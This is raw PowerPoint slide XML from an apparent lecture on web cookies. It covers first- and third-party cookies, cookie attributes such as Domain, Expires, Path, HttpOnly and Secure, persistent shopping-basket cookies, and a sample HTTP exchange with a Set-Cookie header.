              <a:t>While rendering the page, the browser downloads all these objects. Most modern websites that you view contain information from lots of different sources. While this information is being retrieved, some of these sources may set cookies in your browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>First-party cookies are cookies set with the same domain (or its </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>subdomain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) as your browser's address bar. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Third-party cookies are cookies set with domains different from the one shown on the address bar.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Mozilla Firefox, Internet Explorer, Opera and Google Chrome do allow third-party cookies by default, although users can block them</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Third-Party cookies allow to build ‘constellations’ of web sites and allow to track and build user histories across all the web</a:t>
            </a:r>
            <a:endParaRPr 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olo 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1788664-3321-4534-8908-7910E7DF2BEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>Implementation(1)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9B23E1D-C4FA-401A-919C-3F7265883673}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr rtlCol="0">
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In the cookie one can find several attributes:</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>Name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>Value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This is the only obligatory attribute</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t>Domain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Used to specify the source domain of the cookie</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>Expires</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> optional, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>used to define the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>expiration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> date</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> of the cookie </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can be expressed as a date, as the maximum number of days or with 'Now' (implies that the cookie is deleted from your computer as soon as your browser is closed) or 'Never' (implies that the cookie is not subject to deadline)</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>Path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>specifies the URL path from which the cookie is sent to the end user</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Access mode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>HttpOnly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) makes the cookies invisible to JavaScript and other client-side languages ​​on the page</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Secure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>indicates whether the cookie should be obligatorily transmitted with HTTPS</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT"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olo 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62549E5F-A111-4C88-B8B8-D7BF8A70DE86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>Implementation(2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EEC39AEB-2F7E-4862-9FE7-48A526077DBC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981200" y="1600200"/>
            <a:ext cx="8229600" cy="4972050"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0">
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>cookie setter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>can specify a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>deletion date</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If the cookie setter does not specify a date, the cookie is removed once the user quits his or her browser.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Specifying a date is a way for making a cookie survive across sessions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>cookies with an expiration date are called persistent. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A shopping site can use persistent cookies to store the items users have placed in their basket</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>a cookie can refer an entry in a database stored on the site e-shopping</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>if users quit their browser without making a purchase and returns later, they later still find the same items in the basket</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If these cookies were not given an expiration date, they would expire when the browser is closed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the information about the basket content would be lost</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cookies can also be limited in scope to a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>specific domain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>subdomain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> on the web server which created them</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT"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F7D095-9515-4E64-82E0-F32D6C679B9E}"/>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Setting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t> a cookie (1)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DAE79FF-E158-4C1F-A24C-36183F4D983D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1809750" y="1357314"/>
            <a:ext cx="8401050" cy="1400175"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0">
            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Browsers request a page from web servers by sending them a usually short text called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" i="1" dirty="0"/>
              <a:t>HTTP request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0"/>
              <a:t>to access the page </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900" i="1" dirty="0"/>
              <a:t>http://www.example.org/index.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0"/>
              <a:t>, browsers connect to the server www.example.org sending it a request that looks like the following one :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44036" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F1FD90D-3A88-44D2-B28A-954558BEA5E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2809876" y="2857501"/>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400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>GET /index.html HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Host: www.example.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" altLang="it-IT">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="6" name="Tabella 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93A2F005-1440-4F49-A583-99C9A8DF587A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2952750" y="3500439"/>
          <a:ext cx="2571750" cy="357187"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>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tblGrid>
              <a:tr h="357187">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="it-IT" sz="1100" b="1" dirty="0">
                          <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>browser</a:t>
                      </a:r>
                      <a:endParaRPr lang="it-IT" sz="1100" dirty="0">
                        <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                        <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91439" marR="91439" anchor="ctr">
                    <a:lnL>
                      <a:noFill/>
                    </a:lnL>
                    <a:lnR>
                      <a:noFill/>
                    </a:lnR>
                    <a:lnT>
                      <a:noFill/>
                    </a:lnT>
                    <a:lnB>
                      <a:noFill/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="it-IT" sz="1100" dirty="0">
                          <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>→ </a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91439" marR="91439" anchor="ctr">
                    <a:lnL>
                      <a:noFill/>
                    </a:lnL>
                    <a:lnR>
                      <a:noFill/>
                    </a:lnR>
                    <a:lnT>
                      <a:noFill/>
                    </a:lnT>
                    <a:lnB>
                      <a:noFill/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="it-IT" sz="1100" b="1" dirty="0">
                          <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>server</a:t>
                      </a:r>
                      <a:endParaRPr lang="it-IT" sz="1100" dirty="0">
                        <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                        <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91439" marR="91439"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44041" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0ED83116-8046-4942-AA2C-0FD6CDD08E35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2738439" y="5072064"/>
            <a:ext cx="3214687" cy="1169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400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>HTTP/1.1 200 OK</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Content-type: text/html</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Set-Cookie: name=value</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
